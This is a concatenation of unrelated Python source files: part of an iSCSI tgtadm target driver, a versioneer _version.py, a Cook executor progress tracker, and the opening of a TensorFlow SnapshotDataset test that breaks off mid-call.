LOG.debug('StdErr from recreate backing lun: %s', err)
def _get_iscsi_target(self, context, vol_id):
return 0
def _get_target_and_lun(self, context, volume):
lun = 1 # For tgtadm the controller is lun 0, dev starts at lun 1
iscsi_target = 0 # NOTE(jdg): Not used by tgtadm
return iscsi_target, lun
@utils.retry(putils.ProcessExecutionError)
def _do_tgt_update(self, name):
(out, err) = utils.execute('tgt-admin', '--update', name,
run_as_root=True)
LOG.debug("StdOut from tgt-admin --update: %s", out)
LOG.debug("StdErr from tgt-admin --update: %s", err)
def create_iscsi_target(self, name, tid, lun, path,
chap_auth=None, **kwargs):
# Note(jdg) tid and lun aren't used by TgtAdm but remain for
# compatibility
# NOTE(jdg): Remove this when we get to the bottom of bug: #1398078
# for now, since we intermittently hit target already exists we're
# adding some debug info to try and pinpoint what's going on
(out, err) = utils.execute('tgtadm',
'--lld',
'iscsi',
'--op',
'show',
'--mode',
'target',
run_as_root=True)
LOG.debug("Targets prior to update: %s", out)
fileutils.ensure_tree(self.volumes_dir)
vol_id = name.split(':')[1]
write_cache = self.configuration.get('iscsi_write_cache', 'on')
driver = self.iscsi_protocol
chap_str = ''
if chap_auth is not None:
chap_str = 'incominguser %s %s' % chap_auth
target_flags = self.configuration.get('iscsi_target_flags', '')
if target_flags:
target_flags = 'bsoflags ' + target_flags
volume_conf = self.VOLUME_CONF % {
'name': name, 'path': path, 'driver': driver,
'chap_auth': chap_str, 'target_flags': target_flags,
'write_cache': write_cache}
LOG.debug('Creating iscsi_target for Volume ID: %s', vol_id)
volumes_dir = self.volumes_dir
volume_path = os.path.join(volumes_dir, vol_id)
if os.path.exists(volume_path):
LOG.warning(_LW('Persistence file already exists for volume, '
'found file at: %s'), volume_path)
utils.robust_file_write(volumes_dir, vol_id, volume_conf)
LOG.debug(('Created volume path %(vp)s,\n'
'content: %(vc)s'),
{'vp': volume_path, 'vc': volume_conf})
old_persist_file = None
old_name = kwargs.get('old_name', None)
if old_name is not None:
LOG.debug('Detected old persistence file for volume '
'%{vol}s at %{old_name}s',
{'vol': vol_id, 'old_name': old_name})
old_persist_file = os.path.join(volumes_dir, old_name)
try:
# With the persistent tgts we create them
# by creating the entry in the persist file
# and then doing an update to get the target
# created.
self._do_tgt_update(name)
except putils.ProcessExecutionError as e:
if "target already exists" in e.stderr:
# Adding the additional Warning message below for a clear
# ER marker (Ref bug: #1398078).
LOG.warning(_LW('Could not create target because '
'it already exists for volume: %s'), vol_id)
LOG.debug('Exception was: %s', e)
else:
LOG.error(_LE("Failed to create iscsi target for Volume "
"ID: %(vol_id)s: %(e)s"),
{'vol_id': vol_id, 'e': e})
# Don't forget to remove the persistent file we created
os.unlink(volume_path)
raise exception.ISCSITargetCreateFailed(volume_id=vol_id)
# Grab targets list for debug
# Consider adding a check for lun 0 and 1 for tgtadm
# before considering this as valid
(out, err) = utils.execute('tgtadm',
'--lld',
'iscsi',
'--op',
'show',
'--mode',
'target',
run_as_root=True)
LOG.debug("Targets after update: %s", out)
iqn = '%s%s' % (self.iscsi_target_prefix, vol_id)
tid = self._get_target(iqn)
if tid is None:
LOG.error(_LE("Failed to create iscsi target for Volume "
"ID: %(vol_id)s. Please ensure your tgtd config "
"file contains 'include %(volumes_dir)s/*'"), {
'vol_id': vol_id,
'volumes_dir': volumes_dir, })
raise exception.NotFound()
# NOTE(jdg): Sometimes we have some issues with the backing lun
# not being created, believe this is due to a device busy
# or something related, so we're going to add some code
# here that verifies the backing lun (lun 1) was created
# and we'll try and recreate it if it's not there
if not self._verify_backing_lun(iqn, tid):
try:
self._recreate_backing_lun(iqn, tid, name, path)
except putils.ProcessExecutionError:
os.unlink(volume_path)
raise exception.ISCSITargetCreateFailed(volume_id=vol_id)
# Finally check once more and if no go, fail and punt
if not self._verify_backing_lun(iqn, tid):
os.unlink(volume_path)
raise exception.ISCSITargetCreateFailed(volume_id=vol_id)
if old_persist_file is not None and os.path.exists(old_persist_file):
os.unlink(old_persist_file)
return tid
def remove_iscsi_target(self, tid, lun, vol_id, vol_name, **kwargs):
LOG.info(_LI('Removing iscsi_target for Volume ID: %s'), vol_id)
vol_uuid_file = vol_name
volume_path = os.path.join(self.volumes_dir, vol_uuid_file)
if not os.path.exists(volume_path):
LOG.warning(_LW('Volume path %s does not exist, '
'nothing to remove.'), volume_path)
return
if os.path.isfile(volume_path):
iqn = '%s%s' % (self.iscsi_target_prefix,
vol_uuid_file)
else:
raise exception.ISCSITargetRemoveFailed(volume_id=vol_id)
try:
# NOTE(vish): --force is a workaround for bug:
# https://bugs.launchpad.net/storage/+bug/1159948
utils.execute('tgt-admin',
'--force',
'--delete',
iqn,
run_as_root=True)
except putils.ProcessExecutionError as e:
non_fatal_errors = ("can't find the target",
"access control rule does not exist")
if any(error in e.stderr for error in non_fatal_errors):
LOG.warning(_LW("Failed target removal because target or "
"ACL's couldn't be found for iqn: %s."), iqn)
else:
LOG.error(_LE("Failed to remove iscsi target for Volume "
"ID: %(vol_id)s: %(e)s"),
{'vol_id': vol_id, 'e': e})
raise exception.ISCSITargetRemoveFailed(volume_id=vol_id)
# NOTE(jdg): There's a bug in some versions of tgt that
# will sometimes fail silently when using the force flag
# https://bugs.launchpad.net/ubuntu/+source/tgt/+bug/1305343
# For now work-around by checking if the target was deleted,
# if it wasn't, try again without the force.
# This will NOT do any good for the case of mutliple sessions
# which the force was aded for but it will however address
# the cases pointed out in bug:
# https://bugs.launchpad.net/storage/+bug/1304122
if self._get_target(iqn):
try:
LOG.warning(_LW('Silent failure of target removal '
'detected, retry....'))
utils.execute('tgt-admin',
'--delete',
iqn,
run_as_root=True)
except putils.ProcessExecutionError as e:
LOG.error(_LE("Failed to remove iscsi target for Volume "
"ID: %(vol_id)s: %(e)s"),
{'vol_id': vol_id, 'e': e})
raise exception.ISCSITargetRemoveFailed(volume_id=vol_id)
# NOTE(jdg): This *should* be there still but incase
# it's not we don't care, so just ignore it if was
# somehow deleted between entry of this method
# and here
if os.path.exists(volume_path):
os.unlink(volume_path)
else:
LOG.debug('Volume path %s not found at end, '
'of remove_iscsi_target.', volume_path)
| |
# This file helps to compute a version number in source trees obtained from
# git-archive tarball (such as those provided by githubs download-from-tag
# feature). Distribution tarballs (built by setup.py sdist) and build
# directories (produced by setup.py build) will contain a much shorter file
# that just contains the computed version number.
# This file is released into the public domain. Generated by
# versioneer-0.18 (https://github.com/warner/python-versioneer)
"""Git implementation of _version.py."""
import errno
import os
import re
import subprocess
import sys
def get_keywords():
"""Get the keywords needed to look up the version information."""
# these strings will be replaced by git during git-archive.
# setup.py/versioneer.py will grep for the variable names, so they must
# each be defined on a line of their own. _version.py will just call
# get_keywords().
git_refnames = "$Format:%d$"
git_full = "$Format:%H$"
git_date = "$Format:%ci$"
keywords = {"refnames": git_refnames, "full": git_full, "date": git_date}
return keywords
class VersioneerConfig:
"""Container for Versioneer configuration parameters."""
def get_config():
"""Create, populate and return the VersioneerConfig() object."""
# these strings are filled in when 'setup.py versioneer' creates
# _version.py
cfg = VersioneerConfig()
cfg.VCS = "git"
cfg.style = "pep440"
cfg.tag_prefix = "v"
cfg.parentdir_prefix = "threeML-"
cfg.versionfile_source = "threeML/_version.py"
cfg.verbose = False
return cfg
class NotThisMethod(Exception):
"""Exception raised if a method is not valid for the current scenario."""
LONG_VERSION_PY = {}
HANDLERS = {}
def register_vcs_handler(vcs, method): # decorator
"""Create decorator to mark a method as the handler of a VCS."""
def decorate(f):
"""Store f in HANDLERS[vcs][method]."""
if vcs not in HANDLERS:
HANDLERS[vcs] = {}
HANDLERS[vcs][method] = f
return f
return decorate
def run_command(commands, args, cwd=None, verbose=False, hide_stderr=False, env=None):
"""Call the given command(s)."""
assert isinstance(commands, list)
p = None
for c in commands:
try:
dispcmd = str([c] + args)
# remember shell=False, so use git.cmd on windows, not just git
p = subprocess.Popen(
[c] + args,
cwd=cwd,
env=env,
stdout=subprocess.PIPE,
stderr=(subprocess.PIPE if hide_stderr else None),
)
break
except EnvironmentError:
e = sys.exc_info()[1]
if e.errno == errno.ENOENT:
continue
if verbose:
print("unable to run %s" % dispcmd)
print(e)
return None, None
else:
if verbose:
print("unable to find command, tried %s" % (commands,))
return None, None
stdout = p.communicate()[0].strip()
if sys.version_info[0] >= 3:
stdout = stdout.decode()
if p.returncode != 0:
if verbose:
print("unable to run %s (error)" % dispcmd)
print("stdout was %s" % stdout)
return None, p.returncode
return stdout, p.returncode
def versions_from_parentdir(parentdir_prefix, root, verbose):
"""Try to determine the version from the parent directory name.
Source tarballs conventionally unpack into a directory that includes both
the project name and a version string. We will also support searching up
two directory levels for an appropriately named parent directory
"""
rootdirs = []
for i in range(3):
dirname = os.path.basename(root)
if dirname.startswith(parentdir_prefix):
return {
"version": dirname[len(parentdir_prefix) :],
"full-revisionid": None,
"dirty": False,
"error": None,
"date": None,
}
else:
rootdirs.append(root)
root = os.path.dirname(root) # up a level
if verbose:
print(
"Tried directories %s but none started with prefix %s"
% (str(rootdirs), parentdir_prefix)
)
raise NotThisMethod("rootdir doesn't start with parentdir_prefix")
@register_vcs_handler("git", "get_keywords")
def git_get_keywords(versionfile_abs):
"""Extract version information from the given file."""
# the code embedded in _version.py can just fetch the value of these
# keywords. When used from setup.py, we don't want to import _version.py,
# so we do it with a regexp instead. This function is not used from
# _version.py.
keywords = {}
try:
f = open(versionfile_abs, "r")
for line in f.readlines():
if line.strip().startswith("git_refnames ="):
mo = re.search(r'=\s*"(.*)"', line)
if mo:
keywords["refnames"] = mo.group(1)
if line.strip().startswith("git_full ="):
mo = re.search(r'=\s*"(.*)"', line)
if mo:
keywords["full"] = mo.group(1)
if line.strip().startswith("git_date ="):
mo = re.search(r'=\s*"(.*)"', line)
if mo:
keywords["date"] = mo.group(1)
f.close()
except EnvironmentError:
pass
return keywords
@register_vcs_handler("git", "keywords")
def git_versions_from_keywords(keywords, tag_prefix, verbose):
"""Get version information from git keywords."""
if not keywords:
raise NotThisMethod("no keywords at all, weird")
date = keywords.get("date")
if date is not None:
# git-2.2.0 added "%cI", which expands to an ISO-8601 -compliant
# datestamp. However we prefer "%ci" (which expands to an "ISO-8601
# -like" string, which we must then edit to make compliant), because
# it's been around since git-1.5.3, and it's too difficult to
# discover which version we're using, or to work around using an
# older one.
date = date.strip().replace(" ", "T", 1).replace(" ", "", 1)
refnames = keywords["refnames"].strip()
if refnames.startswith("$Format"):
if verbose:
print("keywords are unexpanded, not using")
raise NotThisMethod("unexpanded keywords, not a git-archive tarball")
refs = set([r.strip() for r in refnames.strip("()").split(",")])
# starting in git-1.8.3, tags are listed as "tag: foo-1.0" instead of
# just "foo-1.0". If we see a "tag: " prefix, prefer those.
TAG = "tag: "
tags = set([r[len(TAG) :] for r in refs if r.startswith(TAG)])
if not tags:
# Either we're using git < 1.8.3, or there really are no tags. We use
# a heuristic: assume all version tags have a digit. The old git %d
# expansion behaves like git log --decorate=short and strips out the
# refs/heads/ and refs/tags/ prefixes that would let us distinguish
# between branches and tags. By ignoring refnames without digits, we
# filter out many common branch names like "release" and
# "stabilization", as well as "HEAD" and "master".
tags = set([r for r in refs if re.search(r"\d", r)])
if verbose:
print("discarding '%s', no digits" % ",".join(refs - tags))
if verbose:
print("likely tags: %s" % ",".join(sorted(tags)))
for ref in sorted(tags):
# sorting will prefer e.g. "2.0" over "2.0rc1"
if ref.startswith(tag_prefix):
r = ref[len(tag_prefix) :]
if verbose:
print("picking %s" % r)
return {
"version": r,
"full-revisionid": keywords["full"].strip(),
"dirty": False,
"error": None,
"date": date,
}
# no suitable tags, so version is "0+unknown", but full hex is still there
if verbose:
print("no suitable tags, using unknown + full revision id")
return {
"version": "0+unknown",
"full-revisionid": keywords["full"].strip(),
"dirty": False,
"error": "no suitable tags",
"date": None,
}
@register_vcs_handler("git", "pieces_from_vcs")
def git_pieces_from_vcs(tag_prefix, root, verbose, run_command=run_command):
"""Get version from 'git describe' in the root of the source tree.
This only gets called if the git-archive 'subst' keywords were *not*
expanded, and _version.py hasn't already been rewritten with a short
version string, meaning we're inside a checked out source tree.
"""
GITS = ["git"]
if sys.platform == "win32":
GITS = ["git.cmd", "git.exe"]
out, rc = run_command(GITS, ["rev-parse", "--git-dir"], cwd=root, hide_stderr=True)
if rc != 0:
if verbose:
print("Directory %s not under git control" % root)
raise NotThisMethod("'git rev-parse --git-dir' returned error")
# if there is a tag matching tag_prefix, this yields TAG-NUM-gHEX[-dirty]
# if there isn't one, this yields HEX[-dirty] (no NUM)
describe_out, rc = run_command(
GITS,
[
"describe",
"--tags",
"--dirty",
"--always",
"--long",
"--match",
"%s*" % tag_prefix,
],
cwd=root,
)
# --long was added in git-1.5.5
if describe_out is None:
raise NotThisMethod("'git describe' failed")
describe_out = describe_out.strip()
full_out, rc = run_command(GITS, ["rev-parse", "HEAD"], cwd=root)
if full_out is None:
raise NotThisMethod("'git rev-parse' failed")
full_out = full_out.strip()
pieces = {}
pieces["long"] = full_out
pieces["short"] = full_out[:7] # maybe improved later
pieces["error"] = None
# parse describe_out. It will be like TAG-NUM-gHEX[-dirty] or HEX[-dirty]
# TAG might have hyphens.
git_describe = describe_out
# look for -dirty suffix
dirty = git_describe.endswith("-dirty")
pieces["dirty"] = dirty
if dirty:
git_describe = git_describe[: git_describe.rindex("-dirty")]
# now we have TAG-NUM-gHEX or HEX
if "-" in git_describe:
# TAG-NUM-gHEX
mo = re.search(r"^(.+)-(\d+)-g([0-9a-f]+)$", git_describe)
if not mo:
# unparseable. Maybe git-describe is misbehaving?
pieces["error"] = "unable to parse git-describe output: '%s'" % describe_out
return pieces
# tag
full_tag = mo.group(1)
if not full_tag.startswith(tag_prefix):
if verbose:
fmt = "tag '%s' doesn't start with prefix '%s'"
print(fmt % (full_tag, tag_prefix))
pieces["error"] = "tag '%s' doesn't start with prefix '%s'" % (
full_tag,
tag_prefix,
)
return pieces
pieces["closest-tag"] = full_tag[len(tag_prefix) :]
# distance: number of commits since tag
pieces["distance"] = int(mo.group(2))
# commit: short hex revision ID
pieces["short"] = mo.group(3)
else:
# HEX: no tags
pieces["closest-tag"] = None
count_out, rc = run_command(GITS, ["rev-list", "HEAD", "--count"], cwd=root)
pieces["distance"] = int(count_out) # total number of commits
# commit date: see ISO-8601 comment in git_versions_from_keywords()
date = run_command(GITS, ["show", "-s", "--format=%ci", "HEAD"], cwd=root)[
0
].strip()
pieces["date"] = date.strip().replace(" ", "T", 1).replace(" ", "", 1)
return pieces
def plus_or_dot(pieces):
"""Return a + if we don't already have one, else return a ."""
if "+" in pieces.get("closest-tag", ""):
return "."
return "+"
def render_pep440(pieces):
"""Build up version string, with post-release "local version identifier".
Our goal: TAG[+DISTANCE.gHEX[.dirty]] . Note that if you
get a tagged build and then dirty it, you'll get TAG+0.gHEX.dirty
Exceptions:
1: no tags. git_describe was just HEX. 0+untagged.DISTANCE.gHEX[.dirty]
"""
if pieces["closest-tag"]:
rendered = pieces["closest-tag"]
if pieces["distance"] or pieces["dirty"]:
rendered += plus_or_dot(pieces)
rendered += "%d.g%s" % (pieces["distance"], pieces["short"])
if pieces["dirty"]:
rendered += ".dirty"
else:
# exception #1
rendered = "0+untagged.%d.g%s" % (pieces["distance"], pieces["short"])
if pieces["dirty"]:
rendered += ".dirty"
return rendered
def render_pep440_pre(pieces):
"""TAG[.post.devDISTANCE] -- No -dirty.
Exceptions:
1: no tags. 0.post.devDISTANCE
"""
if pieces["closest-tag"]:
rendered = pieces["closest-tag"]
if pieces["distance"]:
rendered += ".post.dev%d" % pieces["distance"]
else:
# exception #1
rendered = "0.post.dev%d" % pieces["distance"]
return rendered
def render_pep440_post(pieces):
"""TAG[.postDISTANCE[.dev0]+gHEX] .
The ".dev0" means dirty. Note that .dev0 sorts backwards
(a dirty tree will appear "older" than the corresponding clean one),
but you shouldn't be releasing software with -dirty anyways.
Exceptions:
1: no tags. 0.postDISTANCE[.dev0]
"""
if pieces["closest-tag"]:
rendered = pieces["closest-tag"]
if pieces["distance"] or pieces["dirty"]:
rendered += ".post%d" % pieces["distance"]
if pieces["dirty"]:
rendered += ".dev0"
rendered += plus_or_dot(pieces)
rendered += "g%s" % pieces["short"]
else:
# exception #1
rendered = "0.post%d" % pieces["distance"]
if pieces["dirty"]:
rendered += ".dev0"
rendered += "+g%s" % pieces["short"]
return rendered
def render_pep440_old(pieces):
"""TAG[.postDISTANCE[.dev0]] .
The ".dev0" means dirty.
Exceptions:
1: no tags. 0.postDISTANCE[.dev0]
"""
if pieces["closest-tag"]:
rendered = pieces["closest-tag"]
if pieces["distance"] or pieces["dirty"]:
rendered += ".post%d" % pieces["distance"]
if pieces["dirty"]:
rendered += ".dev0"
else:
# exception #1
rendered = "0.post%d" % pieces["distance"]
if pieces["dirty"]:
rendered += ".dev0"
return rendered
def render_git_describe(pieces):
"""TAG[-DISTANCE-gHEX][-dirty].
Like 'git describe --tags --dirty --always'.
Exceptions:
1: no tags. HEX[-dirty] (note: no 'g' prefix)
"""
if pieces["closest-tag"]:
rendered = pieces["closest-tag"]
if pieces["distance"]:
rendered += "-%d-g%s" % (pieces["distance"], pieces["short"])
else:
# exception #1
rendered = pieces["short"]
if pieces["dirty"]:
rendered += "-dirty"
return rendered
def render_git_describe_long(pieces):
"""TAG-DISTANCE-gHEX[-dirty].
Like 'git describe --tags --dirty --always -long'.
The distance/hash is unconditional.
Exceptions:
1: no tags. HEX[-dirty] (note: no 'g' prefix)
"""
if pieces["closest-tag"]:
rendered = pieces["closest-tag"]
rendered += "-%d-g%s" % (pieces["distance"], pieces["short"])
else:
# exception #1
rendered = pieces["short"]
if pieces["dirty"]:
rendered += "-dirty"
return rendered
def render(pieces, style):
"""Render the given version pieces into the requested style."""
if pieces["error"]:
return {
"version": "unknown",
"full-revisionid": pieces.get("long"),
"dirty": None,
"error": pieces["error"],
"date": None,
}
if not style or style == "default":
style = "pep440" # the default
if style == "pep440":
rendered = render_pep440(pieces)
elif style == "pep440-pre":
rendered = render_pep440_pre(pieces)
elif style == "pep440-post":
rendered = render_pep440_post(pieces)
elif style == "pep440-old":
rendered = render_pep440_old(pieces)
elif style == "git-describe":
rendered = render_git_describe(pieces)
elif style == "git-describe-long":
rendered = render_git_describe_long(pieces)
else:
raise ValueError("unknown style '%s'" % style)
return {
"version": rendered,
"full-revisionid": pieces["long"],
"dirty": pieces["dirty"],
"error": None,
"date": pieces.get("date"),
}
def get_versions():
"""Get version information or return default if unable to do so."""
# I am in _version.py, which lives at ROOT/VERSIONFILE_SOURCE. If we have
# __file__, we can work backwards from there to the root. Some
# py2exe/bbfreeze/non-CPython implementations don't do __file__, in which
# case we can only use expanded keywords.
cfg = get_config()
verbose = cfg.verbose
try:
return git_versions_from_keywords(get_keywords(), cfg.tag_prefix, verbose)
except NotThisMethod:
pass
try:
root = os.path.realpath(__file__)
# versionfile_source is the relative path from the top of the source
# tree (where the .git directory might live) to this file. Invert
# this to find the root from __file__.
for i in cfg.versionfile_source.split("/"):
root = os.path.dirname(root)
except NameError:
return {
"version": "0+unknown",
"full-revisionid": None,
"dirty": None,
"error": "unable to find root of source tree",
"date": None,
}
try:
pieces = git_pieces_from_vcs(cfg.tag_prefix, root, verbose)
return render(pieces, cfg.style)
except NotThisMethod:
pass
try:
if cfg.parentdir_prefix:
return versions_from_parentdir(cfg.parentdir_prefix, root, verbose)
except NotThisMethod:
pass
return {
"version": "0+unknown",
"full-revisionid": None,
"dirty": None,
"error": "unable to compute version",
"date": None,
}
| |
import json
import logging
import time
from threading import Event, Lock, Thread
import os
import re
import cook
class ProgressUpdater(object):
"""This class is responsible for sending progress updates to the scheduler.
It throttles the rate at which progress updates are sent.
"""
def __init__(self, driver, task_id, max_message_length, poll_interval_ms, send_message_fn):
"""
driver: MesosExecutorDriver
The mesos driver to use.
task_id: string
The task id.
max_message_length: int
The allowed max message length after encoding.
poll_interval_ms: int
The interval after which to send a subsequent progress update.
send_message: function(driver, message, max_message_length)
The helper function used to send the message.
"""
self.driver = driver
self.task_id = task_id
self.max_message_length = max_message_length
self.poll_interval_ms = poll_interval_ms
self.last_reported_time = None
self.last_progress_data = None
self.send_message = send_message_fn
self.lock = Lock()
def has_enough_time_elapsed_since_last_update(self):
"""Returns true if enough time (based on poll_interval_ms) has elapsed since
the last progress update (available in last_reported_time).
"""
if self.last_reported_time is None:
return True
else:
current_time = time.time()
time_diff_ms = (current_time - self.last_reported_time) * 1000
return time_diff_ms >= self.poll_interval_ms
def send_progress_update(self, progress_data, force_send=False):
"""Sends a progress update if enough time has elapsed since the last progress update.
The force_send flag can be used to ignore the check for enough time having elapsed.
Using this method is thread-safe.
Parameters
----------
progress_data: map
The progress data to send.
force_send: boolean, optional
Defaults to false.
Returns
-------
Nothing
"""
with self.lock:
if progress_data is not None and self.last_progress_data != progress_data:
if force_send or self.has_enough_time_elapsed_since_last_update():
logging.info('Sending progress message {}'.format(progress_data))
message_dict = dict(progress_data)
message_dict['task-id'] = self.task_id
progress_message = json.dumps(message_dict)
if len(progress_message) > self.max_message_length and cook.PROGRESS_MESSAGE_KEY in message_dict:
progress_str = message_dict[cook.PROGRESS_MESSAGE_KEY]
num_extra_chars = len(progress_message) - self.max_message_length
allowed_progress_message_length = max(len(progress_str) - num_extra_chars - 3, 0)
new_progress_str = progress_str[:allowed_progress_message_length].strip() + '...'
logging.info('Progress message trimmed to {}'.format(new_progress_str))
message_dict[cook.PROGRESS_MESSAGE_KEY] = new_progress_str
progress_message = json.dumps(message_dict)
self.send_message(self.driver, progress_message, self.max_message_length)
self.last_reported_time = time.time()
self.last_progress_data = progress_data
else:
logging.debug('Not sending progress data as enough time has not elapsed since last update')
class ProgressWatcher(object):
"""This class tails the output from the target file listening for progress messages.
The retrieve_progress_states generates all progress messages iteratively.
"""
@staticmethod
def match_progress_update(progress_regex_str, input_string):
"""Returns the progress tuple when the input string matches the provided regex.
Parameters
----------
progress_regex_str: string
The progress regex to match against, it must return two capture groups.
input_string: string
The input string.
Returns
-------
the tuple (percent, message) if the string matches the provided regex,
else return None.
"""
matches = re.findall(progress_regex_str, input_string)
return matches[0] if len(matches) >= 1 else None
def __init__(self, config, stop_signal, task_completed_signal):
self.target_file = config.progress_output_name
self.progress_regex_string = config.progress_regex_string
self.progress = None
self.stop_signal = stop_signal
self.task_completed_signal = task_completed_signal
self.max_bytes_read_per_line = config.max_bytes_read_per_line
def current_progress(self):
"""Returns the current progress dictionary."""
return self.progress
def tail(self, sleep_time_ms):
"""This method incrementally generates lines from a file by waiting for new content from a file.
It behaves like the 'tail -f' shell command.
Parameters
----------
sleep_time_ms: int
The unit of time in ms to repetitively sleep when the file has not been created or no new
content is available in the file being tailed.
Returns
-------
an incrementally generated list of lines in the file being tailed.
"""
try:
sleep_param = sleep_time_ms / 1000
while not os.path.isfile(self.target_file) and not self.task_completed_signal.isSet():
logging.debug('{} has not yet been created, sleeping {} ms'.format(self.target_file, sleep_time_ms))
time.sleep(sleep_param)
if self.stop_signal.isSet():
logging.info('No output has been read to parse progress messages')
return
logging.info('{} has been created, reading contents'.format(self.target_file))
target_file_obj = open(self.target_file, 'r')
while not self.stop_signal.isSet():
line = target_file_obj.readline(self.max_bytes_read_per_line)
if not line:
# exit if program has completed and there are no more lines to read
if self.task_completed_signal.isSet():
logging.info('Done processing file for progress messages')
break
# no new line available, sleep before trying again
time.sleep(sleep_param)
continue
yield line
if self.stop_signal.isSet() and not self.task_completed_signal.isSet():
logging.info('Task requested to be killed, may not have processed all progress messages')
except:
logging.exception('Error while tailing {}'.format(self.target_file))
def retrieve_progress_states(self):
"""Generates the progress states by tailing the target_file.
It tails a target file (using the tail() method) and uses the provided
regex to find a match for a progress message. The regex is expected to
generate two components in the match: the progress percent as an int and
a progress message string. When such a message is found, this method
yields the current progress as a dictionary.
Returns
-------
an incrementally generated list of progress states.
"""
if self.progress_regex_string:
sleep_time_ms = 50
for line in self.tail(sleep_time_ms):
progress_report = ProgressWatcher.match_progress_update(self.progress_regex_string, line)
if progress_report is not None:
percent, message = progress_report
logging.info('Updating progress to {} percent, message: {}'.format(percent, message))
self.progress = {cook.PROGRESS_MESSAGE_KEY: message.strip(), 'progress-percent': int(percent)}
yield self.progress
def track_progress(progress_watcher, progress_complete_event, send_progress_update):
"""Sends progress updates to the mesos driver until the stop_signal is set.
Parameters
----------
progress_watcher: ProgressWatcher
The progress watcher which maintains the current progress state
progress_complete_event: Event
Event that triggers completion of progress tracking
send_progress_update: function(current_progress)
The function to invoke while sending progress updates
Returns
-------
Nothing.
"""
try:
for current_progress in progress_watcher.retrieve_progress_states():
logging.debug('Latest progress: {}'.format(current_progress))
send_progress_update(current_progress)
except:
logging.exception('Exception while tracking progress')
finally:
progress_complete_event.set()
def launch_progress_tracker(progress_watcher, progress_updater):
"""Launches the threads that track progress and send progress updates to the driver.
Parameters
----------
progress_watcher: ProgressWatcher
The progress watcher which maintains the current progress state.
progress_updater: ProgressUpdater
The progress updater which sends progress updates to the scheduler.
Returns
-------
The progress complete threading.Event.
"""
progress_complete_event = Event()
progress_update_thread = Thread(target=track_progress,
args=(progress_watcher, progress_complete_event,
progress_updater.send_progress_update))
progress_update_thread.start()
return progress_complete_event
def force_send_progress_update(progress_watcher, progress_updater):
"""Retrieves the latest progress message and attempts to force send it to the scheduler.
Parameters
----------
progress_watcher: ProgressWatcher
The progress watcher which maintains the current progress state.
progress_updater: ProgressUpdater
The progress updater which sends progress updates to the scheduler.
Returns
-------
Nothing.
"""
latest_progress = progress_watcher.current_progress()
progress_updater.send_progress_update(latest_progress, force_send=True)
| |
# Copyright 2019 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Tests for the `SnapshotDataset` transformation."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import os
import time
from absl.testing import parameterized
from tensorflow.python.data.experimental.kernel_tests import reader_dataset_ops_test_base
from tensorflow.python.data.experimental.ops import snapshot
from tensorflow.python.data.kernel_tests import test_base
from tensorflow.python.data.ops import dataset_ops
from tensorflow.python.data.ops import readers as core_readers
from tensorflow.python.framework import combinations
from tensorflow.python.ops import gen_array_ops
from tensorflow.python.ops import string_ops
from tensorflow.python.platform import test
class SnapshotDatasetTest(reader_dataset_ops_test_base.TFRecordDatasetTestBase,
parameterized.TestCase):
def setUp(self):
super(SnapshotDatasetTest, self).setUp()
self.removeTFRecords()
def removeTFRecords(self):
for filename in self.test_filenames:
os.remove(filename)
self.test_filenames = []
def setUpTFRecord(self, num_files=10, num_records=10):
self._num_files = num_files
self._num_records = num_records
self.test_filenames = self._createFiles()
def makeSnapshotDirectory(self):
tmpdir = self.get_temp_dir()
tmpdir = os.path.join(tmpdir, "snapshot")
os.mkdir(tmpdir)
return tmpdir
def assertSnapshotDirectoryContains(
self, directory, num_fingerprints, num_runs_per_fp, num_snapshot_files):
dirlist_raw = os.listdir(directory)
dirlist = []
# Ignore the graphdef pbtxts we write for debugging purposes.
for i in range(len(dirlist_raw)):
if not dirlist_raw[i].endswith("-graph.pbtxt"):
dirlist.append(dirlist_raw[i])
self.assertLen(dirlist, num_fingerprints)
for i in range(num_fingerprints):
fingerprint_dir = os.path.join(directory, dirlist[i])
fingerprint_dir_list = sorted(os.listdir(fingerprint_dir))
self.assertLen(fingerprint_dir_list, num_runs_per_fp + 1)
self.assertEqual(fingerprint_dir_list[num_runs_per_fp],
"snapshot.metadata")
for j in range(num_runs_per_fp):
run_dir = os.path.join(fingerprint_dir, fingerprint_dir_list[j])
run_dirlist = sorted(os.listdir(run_dir))
self.assertLen(run_dirlist, num_snapshot_files)
file_counter = 0
for filename in run_dirlist:
self.assertEqual(filename, "%08d.snapshot" % file_counter)
file_counter += 1
@combinations.generate(test_base.default_test_combinations())
def testWriteDifferentPipelinesInOneDirectory(self):
tmpdir = self.makeSnapshotDirectory()
dataset = dataset_ops.Dataset.range(1000)
dataset = dataset.apply(snapshot.snapshot(tmpdir))
self.assertDatasetProduces(dataset, list(range(1000)))
dataset = dataset_ops.Dataset.range(1001)
dataset = dataset.apply(snapshot.snapshot(tmpdir))
self.assertDatasetProduces(dataset, list(range(1001)))
self.assertSnapshotDirectoryContains(tmpdir, 2, 1, 1)
@combinations.generate(test_base.default_test_combinations())
def testWriteSnapshotMultipleSimultaneous(self):
tmpdir = self.makeSnapshotDirectory()
dataset1 = dataset_ops.Dataset.range(1000)
dataset1 = dataset1.apply(snapshot.snapshot(tmpdir))
next1 = self.getNext(dataset1)
dataset2 = dataset_ops.Dataset.range(1000)
dataset2 = dataset2.apply(snapshot.snapshot(tmpdir))
next2 = self.getNext(dataset2)
for _ in range(1000):
self.evaluate(next1())
self.evaluate(next2())
# we check that only one copy of the metadata has been written, and the
# one that lost the race would be in passthrough mode.
self.assertSnapshotDirectoryContains(tmpdir, 1, 1, 1)
@combinations.generate(test_base.default_test_combinations())
def testGetNextCreatesDir(self):
tmpdir = self.makeSnapshotDirectory()
# We create two iterators but call getNext on only one.
dataset1 = dataset_ops.Dataset.range(1000)
dataset1 = dataset1.apply(snapshot.snapshot(tmpdir))
next1 = self.getNext(dataset1)
dataset2 = dataset_ops.Dataset.range(1001)
dataset2 = dataset2.apply(snapshot.snapshot(tmpdir))
_ = self.getNext(dataset2)
for _ in range(1000):
self.evaluate(next1())
# We check that only one directory is created.
self.assertSnapshotDirectoryContains(tmpdir, 1, 1, 1)
@combinations.generate(
combinations.times(
test_base.default_test_combinations(),
combinations.combine(compression=[
